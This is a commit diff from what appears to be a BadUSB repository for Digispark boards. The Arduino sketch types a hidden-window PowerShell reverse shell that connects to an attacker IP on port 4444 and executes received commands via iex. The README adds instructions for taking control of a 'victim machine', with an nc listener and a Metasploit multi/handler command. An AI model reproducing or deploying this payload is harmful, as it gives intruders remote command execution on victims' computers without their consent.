edit
This commit is contained in:
parent
00825a3676
commit
76dcb91f7e
|
@ -24,7 +24,7 @@ void loop() {
|
||||||
DigiKeyboard.delay(2000);
|
DigiKeyboard.delay(2000);
|
||||||
DigiKeyboard.println("cmd");//run cmd
|
DigiKeyboard.println("cmd");//run cmd
|
||||||
DigiKeyboard.delay(2000);
|
DigiKeyboard.delay(2000);
|
||||||
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
|
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('<YOUR_IP_ADDRESS>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
|
||||||
DigiKeyboard.delay(5000);
|
DigiKeyboard.delay(5000);
|
||||||
digitalWrite(1, HIGH); //turn on led when program finishes
|
digitalWrite(1, HIGH); //turn on led when program finishes
|
||||||
DigiKeyboard.delay(90000);
|
DigiKeyboard.delay(90000);
|
||||||
|
|
|
@ -2,10 +2,23 @@
|
||||||
|
|
||||||
### Description:
|
### Description:
|
||||||
|
|
||||||
#### 1: Install_Shell.ino:<br>
|
#### 1: Instant_Shell.ino:<br>
|
||||||
Starting instant shell to an attacker machine in less than 1 minute.<br>
|
Starting instant shell to an attacker machine in less than 1 minute.<br>
|
||||||
|
|
||||||
**Instuctions:**<br>Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.<br>
|
**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/)
|
||||||
|
|
||||||
|
Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html)
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer.
|
||||||
|
|
||||||
|
```
|
||||||
|
nc -lvnp 4444
|
||||||
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP_ADDRESS>; set lport 4444; set ExitOnSession false; exploit -j"
|
||||||
|
```
|
||||||
|
|
||||||
**Tested on:**<br>
|
**Tested on:**<br>
|
||||||
**OS**: Windows 10|11<br>
|
**OS**: Windows 10|11<br>
|
||||||
|
|
Loading…
Reference in New Issue